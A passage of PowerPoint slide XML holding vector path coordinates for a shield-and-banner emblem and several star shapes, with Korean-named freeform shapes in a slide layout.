                    <a:pt x="282585" y="132913"/>
                    <a:pt x="284781" y="133293"/>
                    <a:pt x="286857" y="134053"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="286857" y="133523"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="286857" y="130312"/>
                    <a:pt x="284946" y="128504"/>
                    <a:pt x="281187" y="128504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278667" y="128503"/>
                    <a:pt x="276173" y="129012"/>
                    <a:pt x="273857" y="130001"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="271946" y="124015"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="275166" y="122506"/>
                    <a:pt x="278694" y="121759"/>
                    <a:pt x="282253" y="121833"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="314519" y="121677"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="320189" y="121677"/>
                    <a:pt x="323510" y="125667"/>
                    <a:pt x="323510" y="131902"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="323510" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315991" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315991" y="134365"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="315991" y="130655"/>
                    <a:pt x="314331" y="128753"/>
                    <a:pt x="311449" y="128753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308567" y="128753"/>
                    <a:pt x="306719" y="130655"/>
                    <a:pt x="306719" y="134365"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="306719" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299200" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299200" y="122176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306719" y="122176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306719" y="126104"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="308396" y="123407"/>
                    <a:pt x="311333" y="121741"/>
                    <a:pt x="314519" y="121677"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="254716" y="121676"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="260888" y="121676"/>
                    <a:pt x="266777" y="126571"/>
                    <a:pt x="266777" y="135923"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="266777" y="136017"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="266777" y="145214"/>
                    <a:pt x="260982" y="150233"/>
                    <a:pt x="254716" y="150233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251452" y="150279"/>
                    <a:pt x="248368" y="148745"/>
                    <a:pt x="246446" y="146118"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="246446" y="157933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238896" y="157933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238896" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246446" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246446" y="126134"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="248239" y="123322"/>
                    <a:pt x="251369" y="121634"/>
                    <a:pt x="254716" y="121676"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="208447" y="121583"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211562" y="121492"/>
                    <a:pt x="214438" y="123241"/>
                    <a:pt x="215777" y="126041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217822" y="123279"/>
                    <a:pt x="221070" y="121657"/>
                    <a:pt x="224518" y="121677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230093" y="121677"/>
                    <a:pt x="233477" y="125168"/>
                    <a:pt x="233477" y="131808"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="233477" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225927" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225927" y="134365"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225927" y="130655"/>
                    <a:pt x="224361" y="128753"/>
                    <a:pt x="221541" y="128753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218722" y="128753"/>
                    <a:pt x="216968" y="130655"/>
                    <a:pt x="216968" y="134365"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="216968" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209449" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209449" y="134365"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="209449" y="130655"/>
                    <a:pt x="207852" y="128753"/>
                    <a:pt x="205032" y="128753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202213" y="128753"/>
                    <a:pt x="200490" y="130655"/>
                    <a:pt x="200490" y="134365"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="200490" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192972" y="149641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192972" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200490" y="122175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200490" y="126104"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="202174" y="123325"/>
                    <a:pt x="205186" y="121614"/>
                    <a:pt x="208447" y="121583"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="175175" y="121055"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="183108" y="121425"/>
                    <a:pt x="189238" y="128123"/>
                    <a:pt x="188868" y="136018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188869" y="136143"/>
                    <a:pt x="188869" y="136268"/>
                    <a:pt x="188868" y="136394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188763" y="144210"/>
                    <a:pt x="182311" y="150462"/>
                    <a:pt x="174457" y="150358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174257" y="150362"/>
                    <a:pt x="174056" y="150361"/>
                    <a:pt x="173856" y="150356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166090" y="150165"/>
                    <a:pt x="159949" y="143746"/>
                    <a:pt x="160141" y="136018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160120" y="135573"/>
                    <a:pt x="160120" y="135127"/>
                    <a:pt x="160141" y="134682"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160512" y="126787"/>
                    <a:pt x="167243" y="120687"/>
                    <a:pt x="175175" y="121055"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="143914" y="113228"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="149074" y="112990"/>
                    <a:pt x="154080" y="115018"/>
                    <a:pt x="157604" y="118777"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152748" y="124607"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150470" y="122108"/>
                    <a:pt x="147272" y="120635"/>
                    <a:pt x="143883" y="120523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143776" y="120528"/>
                    <a:pt x="143670" y="120534"/>
                    <a:pt x="143564" y="120541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137766" y="120960"/>
                    <a:pt x="133407" y="125976"/>
                    <a:pt x="133827" y="131747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133818" y="131864"/>
                    <a:pt x="133810" y="131982"/>
                    <a:pt x="133805" y="132101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133546" y="137897"/>
                    <a:pt x="138058" y="142805"/>
                    <a:pt x="143883" y="143063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147391" y="143011"/>
                    <a:pt x="150708" y="141467"/>
                    <a:pt x="152999" y="138823"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="157854" y="143936"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154386" y="148174"/>
                    <a:pt x="149122" y="150551"/>
                    <a:pt x="143632" y="150358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143451" y="150357"/>
                    <a:pt x="143270" y="150354"/>
                    <a:pt x="143088" y="150347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133215" y="150003"/>
                    <a:pt x="125492" y="141759"/>
                    <a:pt x="125839" y="131933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125828" y="131669"/>
                    <a:pt x="125822" y="131404"/>
                    <a:pt x="125823" y="131138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125849" y="121221"/>
                    <a:pt x="133949" y="113202"/>
                    <a:pt x="143914" y="113228"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="247323" y="82926"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="247170" y="82927"/>
                    <a:pt x="247017" y="82934"/>
                    <a:pt x="246864" y="82946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243017" y="83239"/>
                    <a:pt x="240137" y="86580"/>
                    <a:pt x="240431" y="90408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240430" y="90442"/>
                    <a:pt x="240428" y="90477"/>
                    <a:pt x="240427" y="90512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240310" y="94470"/>
                    <a:pt x="243439" y="97774"/>
                    <a:pt x="247417" y="97890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247592" y="97889"/>
                    <a:pt x="247767" y="97882"/>
                    <a:pt x="247941" y="97868"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251770" y="97558"/>
                    <a:pt x="254620" y="94218"/>
                    <a:pt x="254309" y="90408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254311" y="90373"/>
                    <a:pt x="254312" y="90339"/>
                    <a:pt x="254313" y="90304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254430" y="86346"/>
                    <a:pt x="251301" y="83043"/>
                    <a:pt x="247323" y="82926"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="248145" y="76036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="255912" y="76210"/>
                    <a:pt x="262065" y="82617"/>
                    <a:pt x="261890" y="90346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261892" y="90471"/>
                    <a:pt x="261892" y="90597"/>
                    <a:pt x="261890" y="90722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261785" y="98539"/>
                    <a:pt x="255334" y="104790"/>
                    <a:pt x="247480" y="104687"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247268" y="104692"/>
                    <a:pt x="247057" y="104693"/>
                    <a:pt x="246846" y="104689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239062" y="104549"/>
                    <a:pt x="232866" y="98155"/>
                    <a:pt x="233007" y="90408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233004" y="90251"/>
                    <a:pt x="233004" y="90094"/>
                    <a:pt x="233007" y="89936"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233147" y="82121"/>
                    <a:pt x="239626" y="75897"/>
                    <a:pt x="247480" y="76036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247701" y="76031"/>
                    <a:pt x="247923" y="76031"/>
                    <a:pt x="248145" y="76036"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="267184" y="69490"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="274734" y="69490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274734" y="76535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280999" y="76535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280999" y="83207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274734" y="83207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274734" y="94960"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="274734" y="96737"/>
                    <a:pt x="275454" y="97610"/>
                    <a:pt x="277146" y="97610"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278453" y="97620"/>
                    <a:pt x="279739" y="97287"/>
                    <a:pt x="280874" y="96644"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="280874" y="102879"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="279092" y="103991"/>
                    <a:pt x="277025" y="104565"/>
                    <a:pt x="274922" y="104531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="270317" y="104531"/>
                    <a:pt x="267184" y="102504"/>
                    <a:pt x="267184" y="96269"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="267184" y="83207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264052" y="83207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264052" y="76535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267184" y="76535"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198673" y="68118"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="206316" y="68118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206316" y="82334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220382" y="82334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220382" y="68118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227995" y="68118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227995" y="104063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220382" y="104063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220382" y="89629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206316" y="89629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206316" y="104063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198673" y="104063"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="388356" y="15775"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="388356" y="15775"/>
                    <a:pt x="327770" y="50192"/>
                    <a:pt x="238270" y="17022"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148770" y="50098"/>
                    <a:pt x="88184" y="15806"/>
                    <a:pt x="88184" y="15806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88184" y="15806"/>
                    <a:pt x="79945" y="169157"/>
                    <a:pt x="98334" y="271786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100131" y="281947"/>
                    <a:pt x="103052" y="291879"/>
                    <a:pt x="107043" y="301402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193458" y="281568"/>
                    <a:pt x="283287" y="281675"/>
                    <a:pt x="369654" y="301714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373619" y="292069"/>
                    <a:pt x="376518" y="282023"/>
                    <a:pt x="378300" y="271754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396563" y="169126"/>
                    <a:pt x="388356" y="15775"/>
                    <a:pt x="388356" y="15775"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76938" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76938" y="0"/>
                    <a:pt x="142191" y="37192"/>
                    <a:pt x="238615" y="1341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335007" y="37223"/>
                    <a:pt x="400228" y="0"/>
                    <a:pt x="400228" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400228" y="0"/>
                    <a:pt x="409094" y="165821"/>
                    <a:pt x="389421" y="276774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387722" y="286281"/>
                    <a:pt x="385142" y="295611"/>
                    <a:pt x="381714" y="304644"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388147" y="306266"/>
                    <a:pt x="394569" y="307991"/>
                    <a:pt x="400980" y="309819"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="398349" y="320450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441705" y="320450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441705" y="338127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476571" y="338127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463258" y="363067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476446" y="388007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392303" y="388007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392303" y="370362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337262" y="370362"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="293186" y="412978"/>
                    <a:pt x="238489" y="430935"/>
                    <a:pt x="238489" y="430935"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238489" y="430935"/>
                    <a:pt x="184075" y="412635"/>
                    <a:pt x="140218" y="370362"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84143" y="370362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84143" y="388007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="388007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13220" y="363067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="338127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34898" y="338127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34898" y="320450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76687" y="320450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74056" y="309819"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81115" y="307803"/>
                    <a:pt x="88184" y="305923"/>
                    <a:pt x="95264" y="304177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91896" y="295285"/>
                    <a:pt x="89369" y="286101"/>
                    <a:pt x="87714" y="276743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68104" y="165790"/>
                    <a:pt x="76938" y="0"/>
                    <a:pt x="76938" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="7F807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52" name="그래픽 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F79968BD-8A49-2F41-96C4-ACE7E2175630}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2147542" y="371660"/>
              <a:ext cx="744949" cy="285058"/>
              <a:chOff x="2408118" y="3868190"/>
              <a:chExt cx="1866900" cy="714375"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="자유형: 도형 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{862474B0-EBAD-B845-858D-35734A7AC2A9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2446408" y="3868190"/>
                <a:ext cx="247650" cy="238125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 28385 w 247650"/>
                  <a:gd name="connsiteY0" fmla="*/ 225743 h 238125"/>
                  <a:gd name="connsiteX1" fmla="*/ 110204 w 247650"/>
                  <a:gd name="connsiteY1" fmla="*/ 195358 h 238125"/>
                  <a:gd name="connsiteX2" fmla="*/ 181547 w 247650"/>
                  <a:gd name="connsiteY2" fmla="*/ 245555 h 238125"/>
                  <a:gd name="connsiteX3" fmla="*/ 177927 w 247650"/>
                  <a:gd name="connsiteY3" fmla="*/ 158401 h 238125"/>
                  <a:gd name="connsiteX4" fmla="*/ 247745 w 247650"/>
                  <a:gd name="connsiteY4" fmla="*/ 106109 h 238125"/>
                  <a:gd name="connsiteX5" fmla="*/ 163735 w 247650"/>
                  <a:gd name="connsiteY5" fmla="*/ 82582 h 238125"/>
                  <a:gd name="connsiteX6" fmla="*/ 135541 w 247650"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 238125"/>
                  <a:gd name="connsiteX7" fmla="*/ 87154 w 247650"/>
                  <a:gd name="connsiteY7" fmla="*/ 72581 h 238125"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 247650"/>
                  <a:gd name="connsiteY8" fmla="*/ 73914 h 238125"/>
                  <a:gd name="connsiteX9" fmla="*/ 54102 w 247650"/>
                  <a:gd name="connsiteY9" fmla="*/ 142304 h 238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7650" h="238125">
                    <a:moveTo>
                      <a:pt x="28385" y="225743"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110204" y="195358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181547" y="245555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177927" y="158401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247745" y="106109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163735" y="82582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135541" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87154" y="72581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73914"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54102" y="142304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4" name="자유형: 도형 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C7A0EA-352B-5F46-9896-09A10EF03AC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2408118" y="4146034"/>
                <a:ext cx="190500" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 110871 w 190500"/>
                  <a:gd name="connsiteY0" fmla="*/ 155353 h 190500"/>
                  <a:gd name="connsiteX1" fmla="*/ 176498 w 190500"/>
                  <a:gd name="connsiteY1" fmla="*/ 178403 h 190500"/>
                  <a:gd name="connsiteX2" fmla="*/ 154877 w 190500"/>
                  <a:gd name="connsiteY2" fmla="*/ 112300 h 190500"/>
                  <a:gd name="connsiteX3" fmla="*/ 197072 w 190500"/>
                  <a:gd name="connsiteY3" fmla="*/ 57055 h 190500"/>
                  <a:gd name="connsiteX4" fmla="*/ 127540 w 190500"/>
                  <a:gd name="connsiteY4" fmla="*/ 57150 h 190500"/>
                  <a:gd name="connsiteX5" fmla="*/ 88011 w 190500"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 190500"/>
                  <a:gd name="connsiteX6" fmla="*/ 66580 w 190500"/>
                  <a:gd name="connsiteY6" fmla="*/ 66199 h 190500"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 190500"/>
                  <a:gd name="connsiteY7" fmla="*/ 86106 h 190500"/>
                  <a:gd name="connsiteX8" fmla="*/ 56293 w 190500"/>
                  <a:gd name="connsiteY8" fmla="*/ 126873 h 190500"/>
                  <a:gd name="connsiteX9" fmla="*/ 54673 w 190500"/>
                  <a:gd name="connsiteY9" fmla="*/ 196406 h 19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0500" h="190500">
                    <a:moveTo>
                      <a:pt x="110871" y="155353"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="176498" y="178403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154877" y="112300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197072" y="57055"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127540" y="57150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88011" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66580" y="66199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="86106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56293" y="126873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54673" y="196406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5" name="자유형: 도형 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9988B1-DC69-E14B-B6A2-C15FE4725758}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2518989" y="4374634"/>
                <a:ext cx="133350" cy="123825"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 110395 w 133350"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 123825"/>
                  <a:gd name="connsiteX1" fmla="*/ 68104 w 133350"/>
                  <a:gd name="connsiteY1" fmla="*/ 23241 h 123825"/>
                  <a:gd name="connsiteX2" fmla="*/ 24955 w 133350"/>
                  <a:gd name="connsiteY2" fmla="*/ 1619 h 123825"/>
                  <a:gd name="connsiteX3" fmla="*/ 34004 w 133350"/>
                  <a:gd name="connsiteY3" fmla="*/ 49054 h 123825"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 133350"/>
                  <a:gd name="connsiteY4" fmla="*/ 83344 h 123825"/>
                  <a:gd name="connsiteX5" fmla="*/ 47911 w 133350"/>
                  <a:gd name="connsiteY5" fmla="*/ 89440 h 123825"/>
                  <a:gd name="connsiteX6" fmla="*/ 70104 w 133350"/>
                  <a:gd name="connsiteY6" fmla="*/ 132398 h 123825"/>
                  <a:gd name="connsiteX7" fmla="*/ 90678 w 133350"/>
                  <a:gd name="connsiteY7" fmla="*/ 88678 h 123825"/>
                  <a:gd name="connsiteX8" fmla="*/ 138303 w 133350"/>
                  <a:gd name="connsiteY8" fmla="*/ 80867 h 123825"/>
                  <a:gd name="connsiteX9" fmla="*/ 103156 w 133350"/>
                  <a:gd name="connsiteY9" fmla="*/ 47720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33350" h="123825">
                    <a:moveTo>
                      <a:pt x="110395" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="68104" y="23241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24955" y="1619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34004" y="49054"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="83344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47911" y="89440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70104" y="132398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90678" y="88678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138303" y="80867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103156" y="47720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6" name="자유형: 도형 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B7A66D8-B8AA-724F-B56D-E848F41B6FD8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
